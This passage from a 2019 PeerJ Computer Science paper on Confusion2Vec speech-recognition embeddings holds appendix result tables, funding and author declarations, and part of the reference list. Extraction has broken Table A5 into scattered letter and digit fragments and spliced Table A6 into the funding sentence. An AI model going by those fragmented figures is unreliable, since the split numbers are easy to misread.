models, pre-training boosts the Semantic&Syntactic–acoustic analogy accuracies. A small dip in acoustic analogy accuracies is observed. However, overall average accuracy is improved. Table A4 Similarity task results: model pre-training/initialization. Model Similarity tasks Word similarity Acoustic similarity Google W2V 0.6893 (7.9e-48) -0.3489 (2.2e-28) In-domain W2V 0.4417 (3.5e-16) -0.4377 (3.6e-33) C2V-1 0.6036 (3.8e-34) -0.4327 (2.5e-44) C2V-a 0.5228 (1.4e-24) 0.62 (2.95e-101) C2V-c 0.5798 (4.9e-31) 0.5825 (9.1e-87) C2V-* 0.5341 (9.8e-26) 0.6237 (8.8e-103) Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter. Similarity in terms of Spearman’s correlation. All the models are of 300 dimensions. Numbers inside parenthesis indicate correlation p-value for similarity tasks. Pre-training boosts the word similarity correlation for all the models. The correlation is improved considerably in the case of intra-confusion, inter-confusion, and hybrid intra-inter models while maintaining good correlation on acoustic similarity. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 39/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ T ab le A 5 A n al o gy ta sk re su lt s: m o d el co n ca te n at io n an d jo in t o p ti m iz at io n . M o d el F in e- tu n in g A n al o gy ta sk s S em an ti c& S yn ta ct ic an al o gy A co u st ic an al o gy S em an ti c& S yn ta ct ic – ac o u st ic an al o gy A ve ra ge ac cu ra cy S ch em e S em an ti c S yn ta ct ic S em an ti c& S yn ta ct ic S em an ti c– ac o u st ic S yn ta ct ic – ac o u st ic S em an ti c& S yn ta ct ic – ac o u st ic G o o gl e W 2V – 28 .9 8% (3 5. 75 % ) 70 .7 9% (7 8. 74 % ) 61 .4 2% (6 9. 1% ) 0. 9% (1 .4 2% ) 6. 54 % (1 4. 38 % ) 17 .9 % (2 7. 46 % ) 16 .9 9% (2 6. 42 % ) 26 .4 4% (3 2. 31 % ) In -d o m ai n W 2V (5 56 d im .) – 39 .1 1% (4 8. 03 % ) 70 .4 1% (7 9. 54 % ) 63 .6 % (7 2. 69 % ) 0. 81 % (1 .0 % ) 12 .0 7% (1 8. 62 % ) 14 .7 9% (2 4. 91 % ) 14 .5 4% (2 4. 33 % ) 26 .3 2% (3 2. 67 % ) M o d el co n ca te n at io n C 2V -1 (F ) + C 2V -a (F ) – 6. 22 % (9 .5 % ) 71 .0 3% (8 3. 65 % ) 56 .5 1% (6 7. 03 % ) 13 .5 9% (2 5. 43 % ) 6. 54 % (1 1. 76 % ) 33 .9 1% (4 2. 82 % ) 31 .7 4% (4 0. 36 % ) 33 .9 5% (4 4. 27 % ) C 2V -1 (F ) + C 2V -c (F ) – 36 .5 3% (4 7. 01 % ) 57 .9 4% (7 7. 72 % ) 53 .1 4% (7 0. 84 % ) 20 .9 9% (3 5. 25 % ) 10 .4 6% (1 6. 01 % ) 26 .3 1% (3 6. 83 % ) 25 .0 5% (3 5. 18 % ) 33 .0 6% (4 7. 09 % ) C 2V -1 (F ) + C 2V -* (F ) – 11 .8 5% (1 7. 32 % ) 71 .8 5% (8 2. 74 % ) 58 .4 % (6 8. 08 % ) 6. 35 % (1 1. 39 % ) 7. 84 % (1 2. 18 % ) 34 .3 8% (4 3. 78 % ) 32 .2 8% (4 1. 3% ) 32 .3 4% (4 0. 26 % ) F ix ed co n te xt u al su b sp ac e jo in t o p ti m iz at io n C 2V -1 (F ) + C 2V -a (L ) In te r 22 .9 6% (3 2. 42 % ) 66 .1 9% (8 2. 98 % ) 56 .5 % (7 1. 65 % ) 12 .7 3% (2 0. 54 % ) 13 .4 % (1 8. 3% ) 26 .2 2% (3 5. 09 % ) 25 .2 1% (3 3. 76 % ) 31 .4 8% (4 1. 98 % ) C 2V -1 (F ) + C 2V -a (L ) In tr a 6. 69 % (1 1. 58 % ) 69 .7 9% (8 3. 48 % ) 55 .6 5% (6 7. 37 % ) 17 .0 3% (2 8. 64 % ) 8. 17 % (1 3. 73 % ) 31 .8 5% (4 7. 64 % ) 29 .9 7% (3 9. 09 % ) 34 .2 2% (4 5. 03 % ) C 2V -1 (F ) + C 2V -a (L ) H yb ri d 11 .6 9% (1 9. 79 % ) 69 .3 1% (8 4. 53 % ) 56 .3 9% (7 0. 02 % ) 14 .8 6% (2 5. 84 % ) 9. 8% (1 6. 67 % ) 30 .0 2% (3 8. 94 % ) 28 .4 2% (3 7. 18 % ) 33 .2 2% (4 4. 35 % ) C 2V -1 (F ) + C 2V -c (L ) In te r 39 .1 9% (5 0. 57 % ) 58 .3 5% (7 8. 21 % ) 54 .0 5% (7 2. 01 % ) 23 .3 3% (3 5. 25 % ) 12 .4 2% (1 8. 3% ) 24 .4 5% (3 4. 89 % ) 23 .5 % (3 3. 58 % ) 33 .6 3% (4 6. 95 % ) C 2V -1 (F ) + C 2V -c (L ) In tr a 22 .7 6% (3 2. 85 % ) 62 .0 7% (8 0. 34 % ) 53 .2 6% (6 9. 7% ) 24 .7 6% (3 9. 32 % ) 7. 52 % (1 1. 11 % ) 29 .9 7% (4 1. 47 % ) 28 .1 9% (3 9. 07 % ) 35 .4 0% (4 9. 36 % ) C 2V -1 (F ) + C 2V -c (L ) H yb ri d 30 .5 4% (4 3. 21 % ) 61 .5 6% (8 0. 81 % ) 54 .6 1% (7 2. 38 % ) 23 .6 % (3 7. 75 % ) 8. 5% (1 4. 71 % ) 28 .2 5% (3 9. 95 % ) 26 .6 8% (3 7. 95 % ) 34 .9 6% (4 9. 36 % ) C 2V -1 (F ) + C 2V -* (L ) In te r 27 .0 2% (3 5. 9% ) 67 .5 2% (8 1. 6% ) 58 .4 5% (7 1. 36 % ) 5. 04 % (8 .5 5% ) 11 .7 6% (1 6. 67 % ) 26 .2 8% (3 4. 64 % ) 25 .1 3% (3 3. 21 % ) 29 .5 4% (3 7. 71 % ) C 2V -1 (F ) + C 2V -* (L ) In tr a 10 .4 8% (1 5. 84 % ) 70 .4 4% (8 1. 57 % ) 57 .0 0% (6 6. 85 % ) 7. 21 % (1 3. 33 % ) 6. 21 % (1 2. 09 % ) 34 .0 7% (4 2. 52 % ) 31 .8 7% (4 0. 1% ) 32 .0 3% (4 0. 09 ) C 2V -1 (F ) + C 2V -* (L ) H yb ri d 15 .4 1% (2 3. 31 % ) 70 .5 6% (8 2. 61 % ) 58 .2 % (6 8. 32 % ) 6. 39 % (1 1. 61 % ) 8. 17 % (1 2. 09 % ) 32 .3 6% (4 0. 43 % ) 30 .4 4% (3 8. 19 % ) 31 .6 8% (3 9. 37 % ) U n re st ri ct ed jo in t o p ti m iz at io n C 2V -1 (L ) + C 2V -a (L ) In te r 8. 6% (1 4. 74 % ) 57 .9 6% (7 5. 8% ) 46 .9 % (6 2. 12 % ) 30 .7 3% (4 6. 42 % ) 5. 88 % (1 2. 75 % ) 26 .7 9% (3 8. 44 % ) 25 .1 3% (3 6. 4% ) 34 .2 5% (4 8. 31 % ) Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 40/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ T ab le A 5 (c o n ti n u ed ). M o d el F in e- tu n in g A n al o gy ta sk s S em an ti c& S yn ta ct ic an al o gy A co u st ic an al o gy S em an ti c& S yn ta ct ic – ac o u st ic an al o gy A ve ra ge ac cu ra cy S ch em e S em an ti c S yn ta ct ic S em an ti c& S yn ta ct ic S em an ti c– ac o u st ic S yn ta ct ic – ac o u st ic S em an ti c& S yn ta ct ic – ac o u st ic C 2V -1 (L ) + C 2V -a (L ) In tr a 4. 97 % (7 .9 % ) 69 .2 7% (8 1. 30 % ) 54 .8 6% (6 4. 85 % ) 23 .8 6% (4 0. 55 % ) 7. 84 % (1 1. 44 % ) 34 .9 2% (4 5. 02 % ) 32 .7 7% (4 2. 38 % ) 37 .1 6% (4 9. 26 % ) C 2V -1 (L ) + C 2V -a (L ) H yb ri d 1. 1% (1 .6 4% ) 26 .5 4% (4 0. 32 % ) 20 .8 3% (3 1. 65 % ) 49 .2 5% (6 1. 91 % ) 2. 29 % (3 .9 2% ) 15 .0 5% (2 5. 24 % ) 14 .0 4% (2 3. 55 % ) 28 .1 2% (3 9. 04 % ) C 2V -1 (L ) + C 2V -c (L ) In te r 33 .0 1% (4 3. 72 % ) 50 .8 1% (7 1. 13 % ) 46 .8 2% (6 4. 98 % ) 37 .1 5% (5 2. 99 % ) 9. 48 % (1 6. 01 % ) 23 .1 6% (3 6. 41 % ) 22 .0 7% (3 4. 79 % ) 35 .3 5% (5 0. 92 % ) C 2V -1 (L ) + C 2V -c (L ) In tr a 21 .9 % (3 0. 43 % ) 58 .9 9% (7 6. 12 % ) 50 .6 8% (6 5. 88 % ) 33 .0 5% (4 9. 4% ) 7. 52 % (1 0. 46 % ) 31 .2 3% (4 4. 12 % ) 29 .3 5% (4 1. 51 % ) 37 .6 9% (5 2. 26 % ) C 2V -1 (L ) + C 2V -c (L ) H yb ri d 10 .4 8% (1 5. 72 % ) 30 .0 % (4 4. 25 % ) 25 .6 3% (3 7. 86 % ) 52 .7 3% (6 7. 21 % ) 3. 27 % (4 .9 % ) 16 .0 9% (2 7. 77 % ) 15 .0 8% (2 5. 96 % ) 31 .1 5% (4 3. 68 % ) C 2V -1 (L ) + C 2V -* (L ) In te r 19 .2 4% (2 6. 59 % ) 61 .5 7% (7 6. 8% ) 52 .0 8% (6 5. 54 % ) 17 .8 5% (2 7. 97 % ) 7. 52 % (1 2. 75 % ) 28 .8 1% (3 8. 94 % ) 27 .1 2% (3 6. 87 % ) 32 .3 5% (4 3. 46 % ) C 2V -1 (L ) + C 2V -* (L ) In tr a 10 .0 9% (1 3. 77 % ) 68 .7 6% (7 9. 06 % ) 55 .6 1% (6 4. 42 % ) 10 .3 4% (2 0. 05 % ) 5. 88 % (9 .4 8% ) 36 .1 3% (4 5. 41 % ) 33 .7 3% (4 2. 56 % ) 33 .2 3% (4 2. 34 % ) C 2V -1 (L ) + C 2V -* (L ) H yb ri d 12 .9 8% (1 7. 91 % ) 68 .2 6% (7 9. 62 % ) 55 .8 7% (6 5. 79 % ) 11 .7 3% (2 2. 63 % ) 5. 88 % (1 0. 46 % ) 35 .2 8% (4 3. 92 % ) 32 .9 5% (4 1. 3% ) 33 .5 2% (4 3. 24 % ) N o te s: C 2V -1 , to p -c o n fu si o n ; C 2V -a , in tr a- co n fu si o n ; C 2V -c , in te r- co n fu si o n ; C 2V -* , h yb ri d in tr a- in te r. N u m b er s in si d e p ar en th es is in d ic at e to p -2 ev al u at io n ac cu ra cy ; A ll th e m o d el s ar e o f 55 6 d im en si o n s. N u m b er s o u ts id e p ar en th es is re p re se n t to p -1 ev al u at io n ac cu ra cy . A cr o n ym s: (F ): F ix ed em b ed d in g, (L ): L ea rn em be d d in g d u ri n g jo in t tr ai n in g. M o d el co n ca te n at io n p ro vi d es ga in s in ac o u st ic -a n al o gy ta sk an d th er eb y re su lt in g in ga in s in av er ag e ac cu ra cy co m p ar ed to re su lt s in T ab le A 3 fo r in tr a- co n fu si on an d in te r- co n fu si o n m o d el s. F ix ed co n te xt u al su b sp ac e an d u n re st ri ct ed jo in t o p ti m iz at io n s fu rt h er im p ro ve s re su lt s o ve r m od el co n ca te n at io n . B es t re su lt s in te rm s o f av er ag e ac cu ra cy is o b ta in ed w it h u n re st ri ct ed jo in t o p ti m iz at io n s, an ab so lu te im p ro ve m en t o f 10 % .C o n fu si o n 2V ec m o d el s su rp as s W o rd 2V ec ev en fo r Se m an ti c& Sy n ta ct ic an al o gy ta sk (t o p -2 ev al u at io n ac cu ra cy ). Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 41/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ ACKNOWLEDGEMENTS Opinions, interpretations, conclusions and recommendations are those of the author and are not necessarily endorsed by the Department of Defense. ADDITIONAL INFORMATION AND DECLARATIONS Funding The U.S. Army Medical Research Acquisition Activity is the awarding and administering acquisition office. This work was supported by the Office of the Assistant Secretary of Table A6 Similarity task results: model concatenation and joint optimization. Model Fine-tuning scheme Similarity tasks Word similarity Acoustic similarity Google W2V – 0.6893 (7.9e-48) -0.3489 (2.2e-28) In-domain W2V (556 dim.) – 0.6333 (4.9e-36) -0.4717 (5.7e-39) Model concatenation C2V-1 (F) + C2V-a (F) – 0.5102 (2.9e-23) 0.7231 (2.2e-153) C2V-1 (F) + C2V-c (F) – 0.5609 (9.8e-29) 0.6345 (2.3e-107) C2V-1 (F) + C2V-* (F) – 0.4142 (4.1e-15) 0.5285 (5.6e-69) Fixed contextual subspace joint optimization C2V-1 (F) + C2V-a (L) Inter 0.5676 (1.6e-29) 0.4437 (9.1e-47) C2V-1 (F) + C2V-a (L) Intra 0.5211 (2.3e-24) 0.6967 (6.5e-138) C2V-1 (F) + C2V-a (L) Hybrid 0.5384 (3.4e-26) 0.6287 (6.7e-105) C2V-1 (F) + C2V-c (L) Inter 0.5266 (6.1e-25) 0.5818 (1.6e-86) C2V-1 (F) + C2V-c (L) Intra 0.5156 (8.3e-24) 0.7021 (6.3e-141) C2V-1 (F) + C2V-c (L) Hybrid 0.5220 (1.8e-24) 0.6674 (1.4e-122) C2V-1 (F) + C2V-* (L) Inter 0.5587 (1.7e-28) 0.302 (2.5e-21) C2V-1 (F) + C2V-* (L) Intra 0.4996 (3.1e-22) 0.5691 (4.7e-82) C2V-1 (F) + C2V-* (L) Hybrid 0.5254 (8.2e-25) 0.4945 (2.6e-59) Unrestricted joint optimization C2V-1 (L) + C2V-a (L) Inter 0.5513 (1.3e-27) 0.7926 (2.4e-204) C2V-1 (L) + C2V-a (L) Intra 0.5033 (1.4e-22) 0.7949 (2e-206) C2V-1 (L) + C2V-a (L) Hybrid 0.1067 (0.0528) 0.8309 (8.5e-242) C2V-1 (L) + C2V-c (L) Inter 0.5763 (1.3e-30) 0.7725 (8.2e-188) C2V-1 (L) + C2V-c (L) Intra 0.5379 (3.8e-26) 0.7717 (3.5e-187) C2V-1 (L) + C2V-c (L) Hybrid 0.2295 (2.6e-5) 0.8294 (3.6e-240) C2V-1 (L) + C2V-* (L) Inter 0.5338 (1e-25) 0.6953 (3.7e-137) C2V-1 (L) + C2V-* (L) Intra 0.4920 (1.6e-21) 0.6942 (1.5e-136) C2V-1 (L) + C2V-* (L) Hybrid 0.4967 (5.8e-22) 0.6986 (5.9e-139) Notes: C2V-1, top-confusion; C2V-a, intra-confusion; C2V-c, inter-confusion; C2V-*, hybrid intra-inter. Similarity in terms of Spearman’s correlation. All the models are of 556 dimensions. Numbers inside parenthesis indicate correlation p-value for similarity tasks. Good correlations are observed for both the word similarity and acoustic similarity with model concatenation with and without joint optimization. All the correlations are found to be statistically significant. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 42/49 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Defense for Health Affairs through the Psychological Health and Traumatic Brain Injury Research Program under Award No. W81XWH-15-1-0632. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: The U.S. Army Medical Research Acquisition Activity is the awarding and administering acquisition office. Office of the Assistant Secretary of Defense for Health Affairs through the Psychological Health and Traumatic Brain Injury Research Program under Award: W81XWH-15-1-0632. Competing Interests The authors declare that they have no competing interests. Author Contributions � Prashanth Gurunath Shivakumar performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Panayiotis Georgiou conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Data are derivatives of LDC datasets: https://www.ldc.upenn.edu and derived using standard Kaldi recipes as described in the article: http://kaldi-asr.org. Our training and validation code is at: https://bitbucket.org/georgiou/confusion2vec. REFERENCES Abadi M, Barham P, Chen J, Chen Z, Davis A, Dean J, Devin M, Ghemawat S, Irving G, Isard M, Kudlur M, Levenberg J, Monga R, Moore S, Murray DG, Steiner B, Tucker P, Vasudevan V, Warden P, Wicke M, Yu Y, Zheng X. 2016. Tensorflow: a system for large-scale machine learning. In: 12th USENIX Symposium on Operating Systems Design and Implementation (OSDI 16). Savannah: USENIX Association, 265–283. Allauzen A. 2007. Error detection in confusion network. In: INTERSPEECH 2007, Eighth Annual Conference of the International Speech Communication Association. August 27–31, 2007, Antwerp, 1749–1752. Bengio Y, Ducharme R, Vincent P, Jauvin C. 2003. A neural probabilistic language model. Journal of Machine Learning Research 3:1137–1155. Bengio S, Heigold G. 2014. Word embeddings for speech recognition. In: INTERSPEECH 2014, 15th Annual Conference of the International Speech Communication Association. September 14–18, 2014, Singapore, 1053–1057. Bertoldi N, Zens R, Federico M. 2007. Speech translation by confusion network decoding. In: 2007 IEEE International Conference on Acoustics, Speech and Signal Processing. Vol. 4. Piscataway: IEEE, IV–1297. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 43/49 https://www.ldc.upenn.edu http://kaldi-asr.org https://bitbucket.org/georgiou/confusion2vec http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Blei DM, Ng AY, Jordan MI. 2003. Latent dirichlet allocation. Journal of Machine Learning Research 3:993–1022. Bojanowski P, Grave E, Joulin A, Mikolov T. 2017. Enriching word vectors with subword information. Transactions of the Association for Computational Linguistics 5:135–146 DOI 10.1162/tacl_a_00051. Botha JA, Blunsom P. 2014. Compositional morphology for word representations and language modelling. In: Proceedings of the 31th International Conference on Machine Learning, ICML 2014. 21–26 June 2014, Beijing, 1899–1907. Buckman J, Neubig G. 2018. Neural lattice language models. Transactions of the Association for Computational Linguistics 6:529–541 DOI 10.1162/tacl_a_00036. Celebi A, Sak H, Dikici E, Saraçlar M, Lehr M, Prud’hommeaux E, Xu P, Glenn N, Karakos D, Khudanpur S, Roark B, Sagae K, Shafran I, Bikel D, Callison-Burch C, Cao Y, Hall K, Hasler E, Koehn P, Lopez A, Post M, Riley D. 2012. Semi-supervised discriminative language modeling for Turkish ASR. In: 2012 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). Piscataway: IEEE, 5025–5028. Chelba C, Hazen TJ, Saraclar M. 2008. Retrieval and browsing of spoken content. IEEE Signal Processing Magazine 25(3):39–49 DOI 10.1109/msp.2008.917992. Chen X, Xu L, Liu Z, Sun M, Luan H. 2015. Joint learning of character and word embeddings. In: IJCAI’15 Proceedings of the 24th International Conference on Artificial Intelligence. Palo Alto: AAAI Press, 1236–1242. Chung Y-A, Wu C-C, Shen C-H, Lee H-Y, Lee L-S. 2016. Audio word2vec: unsupervised learning of audio segment representations using sequence-to-sequence autoencoder. In: Interspeech 2016, 17th Annual Conference of the International Speech Communication Association. September 8– 12, 2016, San Francisco, 765–769. Cieri C, Miller D, Walker K. 2004. The fisher corpus: a resource for the next generations of speech-to-text. In: Proceedings of the Fourth International Conference on Language Resources and Evaluation (LREC). Vol. 4. Paris: ELRA, 69–71. Costa-Jussà MR, Fonollosa JAR. 2007. Analysis of statistical and morphological classes to generate weighted reordering hypotheses on a statistical machine translation system. In: Proceedings of the Second Workshop on Statistical Machine Translation, WMT@ACL 2007. June 23, 2007, Prague, 171–176. Cotterell R, Schütze H. 2015. Morphological word-embeddings. In: NAACL HLT 2015, The 2015 Conference of the North American Chapter of the Association for Computational Linguistics. May 31–June 5, 2015, Denver: Human Language Technologies, 1287–1292. Deerwester S, Dumais ST, Furnas GW, Landauer TK, Harshman R. 1990. Indexing by latent semantic analysis. Journal of the American Society for Information Science 41(6):391–407. Dikici E, Celebi A, Saraçlar M. 2012. Performance comparison of training algorithms for semi- supervised discriminative language modeling. In: INTERSPEECH 2012, 13th Annual Conference of the International Speech Communication Association. September 9–13, 2012, Portland, 206–209. Dyer CJ. 2007. The “noisier channel”: translation from morphologically complex languages. In: Proceedings of the Second Workshop on Statistical Machine Translation, WMT@ACL 2007. June 23, 2007, Prague, 207–211. Dyer C. 2009. Using a maximum entropy model to build segmentation lattices for MT. In: Human Language Technologies: Conference of the North American Chapter of the Association of Computational Linguistics, Proceedings. May 31–June 5 2009, Boulder, 406–414. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 44/49 http://dx.doi.org/10.1162/tacl_a_00051 http://dx.doi.org/10.1162/tacl_a_00036 http://dx.doi.org/10.1109/msp.2008.917992 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Dyer CJ. 2010. A formal model of ambiguity and its applications in machine translation. College Park: University of Maryland. Dyer C, Muresan S, Resnik P. 2008. Generalizing word lattice translation. In: ACL 2008, Proceedings of the 46th Annual Meeting of the Association for Computational Linguistics. June 15–20, 2008, Columbus, 1012–1020. Erhan D, Bengio Y, Courville A, Manzagol P-A, Vincent P, Bengio S. 2010. Why does unsupervised pre-training help deep learning? Journal of Machine Learning Research 11:625–660. Faruqui M, Dyer C. 2014. Improving vector space word representations using multilingual correlation. In: Proceedings of the 14th Conference of the European Chapter of the Association for Computational Linguistics, EACL 2014. April 26–30, 2014, Gothenburg, 462–471. Finkelstein L, Gabrilovich E, Matias Y, Rivlin E, Solan Z, Wolfman G, Ruppin E. 2001. Placing search in context: the concept revisited. In: Proceedings of the 10th International Conference on World Wide Web. New York: ACM, 406–414. Ghannay S, Estève Y, Camelin N. 2015a. Word embeddings combination and neural networks for robustness in ASR error detection. In: 23rd European Signal Processing Conference, EUSIPCO 2015. August 31–September 4, 2015, Nice, 1671–1675. Ghannay S, Estève Y, Camelin N, Deléglise P. 2016. Acoustic word embeddings for ASR error detection. In: Interspeech 2016, 17th Annual Conference of the International Speech Communication Association. September 8–12, 2016, San Francisco, 1330–1334. Ghannay S, Estève Y, Camelin N, Dutrey C, Santiago F, Adda-Decker M. 2015b. Combining continuous word representation and prosodic features for ASR error prediction. In: Proceedings of the Third International Conference on Statistical Language and Speech Processing. Vol. 9449, SLSP 2015, New York: Springer-Verlag, 84–95. Hakkani-Tür D, Béchet F, Riccardi G, Tur G. 2006. Beyond ASR 1-best: using word confusion networks in spoken language understanding. Computer Speech & Language 20(4):495–514 DOI 10.1016/j.csl.2005.07.005. Hardmeier C, Bisazza A, Federico M. 2010. FBK at WMT 2010: word lattices for morphological reduction and chunk-based reordering. In: Proceedings of the Joint Fifth Workshop on Statistical Machine Translation and Metrics MATR, WMT@ACL 2010. July 15–16, 2010, Uppsala, 88–92. He W, Wang W, Livescu K. 2016. Multi-view recurrent neural acoustic word embeddings. In: 5th International Conference on Learning Representations, ICLR 2017. April 24–26, 2017, Toulon: Conference Track Proceedings. Hofmann T. 1999. Probabilistic latent semantic analysis. In: UAI ‘99: Proceedings of the Fifteenth Conference on Uncertainty in Artificial Intelligence. July 30–August 1, 1999, Stockholm, 289–296. Hoffmeister B, Hillard D, Hahn S, Schluter R, Ostendor M, Ney H. 2007. Cross-site and intra- site ASR system combination: comparisons on lattice and 1-best methods. In: Proceedings of the IEEE International Conference on Acoustics, Speech, and Signal Processing, ICASSP 2007. April 15–20, 2007, Honolulu, 1145–1148. Hori T, Hetherington IL, Hazen TJ, Glass JR. 2007. Open-vocabulary spoken utterance retrieval using confusion networks. In: Proceedings of the IEEE International Conference on Acoustics, Speech, and Signal Processing, ICASSP 2007. April 15–20, 2007, Honolulu, 73–76. Huang EH, Socher R, Manning CD, Ng AY. 2012. Improving word representations via global context and multiple word prototypes. In: The 50th Annual Meeting of the Association for Computational Linguistics, Proceedings of the Conference. July 8–14, 2012. Vol. 1. Jeju Island: Long Papers, 873–882. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 45/49 http://dx.doi.org/10.1016/j.csl.2005.07.005 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Jiang H. 2005. Confidence measures for speech recognition: a survey. Speech Communication 45(4):455–470 DOI 10.1016/j.specom.2004.12.004. Joulin A, Grave E, Bojanowski P, Mikolov T. 2016. Bag of tricks for efficient text classification. In: Proceedings of the 15th Conference of the European Chapter of the Association for Computational Linguistics. Vol. 2. Valencia: Short Papers, 427–431. Kamper H, Wang W, Livescu K. 2016. Deep convolutional acoustic word embeddings using word-pair side information. In: 2016 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). Piscataway: IEEE, 4950–4954. Kemp T, Schaaf T. 1997. Estimating confidence using word lattices. In: Fifth European Conference on Speech Communication and Technology, EUROSPEECH 1997, September 22–25, 1997, Rhodes. Kim Y. 2014. Convolutional neural networks for sentence classification. arXiv preprint Available at http://arxiv.org/abs/1408.5882. Kruengkrai C, Uchimoto K, Kazama J, Wang Y, Torisawa K, Isahara H. 2009. An error-driven word-character hybrid model for joint Chinese word segmentation and POS tagging. In: ACL 2009, Proceedings of the 47th Annual Meeting of the Association for Computational Linguistics and the 4th International Joint Conference on Natural Language Processing of the AFNLP. 2–7 August 2009, Singapore, 513–521. Kurata G, Itoh N, Nishimura M. 2011. Training of error-corrective model for ASR without using audio data. In: Acoustics, Speech and Signal Processing (ICASSP), 2011 IEEE International Conference. Piscataway: IEEE, 5576–5579. Ladhak F, Gandhe A, Dreyer M, Mathias L, Rastrow A, Hoffmeister B. 2016. Latticernn: recurrent neural networks over lattices. In: Interspeech 2016, 17th Annual Conference of the International Speech Communication Association. September 8–12, 2016, San Francisco, 695–699. Lavie A, Waibel A, Levin L, Finke M, Gates D, Gavalda M, Zeppenfeld T, Zhan P. 1997. Janus-iii: Speech-to-speech translation in multiple languages. In: 1997 IEEE International Conference on Acoustics, Speech, and Signal Processing. Vol. 1. Piscataway: IEEE, 99–102. Le Q, Mikolov T. 2014. Distributed representations of sentences and documents. In: Proceedings of the 31th International Conference on Machine Learning, ICML 2014. 21–26 June 2014, Beijing, 1188–1196. Levin K, Henry K, Jansen A, Livescu K. 2013. Fixed-dimensional acoustic embeddings of variable-length segments in low-resource settings. In: IEEE Workshop on Automatic Speech Recognition and Understanding (ASRU). Piscataway: IEEE, 410–415. Levy O, Goldberg Y. 2014. Dependency-based word embeddings. In: Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics, ACL 2014. June 22–27, 2014. Vol. 2. Baltimore: Short Papers, 302–308. Lilleberg J, Zhu Y, Zhang Y. 2015. Support vector machines and word2vec for text classification with semantic features. In: 2015 IEEE 14th International Conference on Cognitive Informatics & Cognitive Computing (ICCI� CC). Piscataway: IEEE, 136–140. Ling W, Dyer C, Black AW, Trancoso I. 2015. Two/too simple adaptations of word2vec for syntax problems. In: NAACL HLT 2015, The 2015 Conference of the North American Chapter of the Association for Computational Linguistics. May 31—June 5, 2015. Denver: Human Language Technologies, 1299–1304. Liu X, Wang Y, Chen X, Gales MJF, Woodland PC. 2014. Efficient lattice rescoring using recurrent neural network language models. In: 2014 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP). Piscataway: IEEE, 4908–4912. Gurunath Shivakumar and Georgiou (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.195 46/49 http://dx.doi.org/10.1016/j.specom.2004.12.004 http://arxiv.org/abs/1408.5882 http://dx.doi.org/10.7717/peerj-cs.195 https://peerj.com/computer-science/ Luong T, Socher R, Manning C. 2013. Better word representations with recursive neural networks for morphology. In: Proceedings of the Seventeenth Conference on Computational Natural Language Learning, CoNLL 2013. August 8–9, 2013, Sofia, 104–113. Mangu L, Brill E, Stolcke A. 2000. Finding consensus in speech recognition: word error minimization and other applications of confusion networks. Computer Speech & Language 14(4):373–400 DOI 10.1006/csla.2000.0152. Marin A, Kwiatkowski T, Ostendorf M, Zettlemoyer L. 2012. Using syntactic and confusion network structure for out-of-vocabulary word detection. In: 2012 IEEE Spoken Language Technology Workshop (SLT). Piscataway: IEEE, 159–164. Mathias L, Byrne W. 2006. Statistical phrase-based speech translation. In: 2006 IEEE International Conference on Acoustics, Speech and Signal Processing. Piscataway: IEEE, 1. Matusov E, Kanthak S, Ney H. 2005. On the integration of speech recognition and statistical machine translation. In: INTERSPEECH 2005—Eurospeech, 9th European Conference on Speech Communication and Technology. September 4–8, 2005, Lisbon, 3177–3180. Matusov E, Ueffing N, Ney H. 2006. Computing consensus translation for multiple machine translation systems using enhanced hypothesis alignment. In: EACL 2006, 11st Conference of the European Chapter of the Association for Computational Linguistics, Proceedings of the Conference, April 3–7, 2006, Trento. Mikolov T, Chen K, Corrado G, Dean J. 2013a. Efficient estimation of word representations in vector space. In: 1st International Conference on Learning Representations, ICLR 2013, May 2–4, 2013, Scottsdale: Workshop Track Proceedings. Mikolov T, Karafiát M, Burget L, Černockỳ J, Khudanpur S. 2010. Recurrent neural network based language model. In: INTERSPEECH 2010, 11th Annual Conference of the International Speech Communication Association. September 26–30, 2010, Makuhari, Chiba, 1045–1048. Mikolov T, Le QV, Sutskever I. 2013b. Exploiting similarities among languages for machine translation. arXiv preprint Available at http://arxiv.org/abs/1309.4168. Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. 2013c. Distributed representations of words and phrases and their compositionality. In: Advances in Neural Information Processing Systems 26: 27th Annual Conference on Neural Information Processing Systems 2013. December 5–8, 2013, Lake Tahoe, 3111–3119. Mnih A, Kavukcuoglu K. 2013. Learning word embeddings efficiently with noise-contrastive estimation. In: Advances in Neural Information Processing Systems 26: 27th Annual Conference on Neural Information Processing Systems 2013. December 5–8, 2013, Lake Tahoe, 2265–2273. Niehues J, Kolss M. 2009. A POS-based model for long-range reorderings in SMT. In: Proceedings of the Fourth Workshop on Statistical Machine Translation, WMT@EACL 2009. March 30–31, 2009, Athens, 206–214. Ogata J, Goto M. 2005. Speech repair: quick error correction just by using selection operation for speech 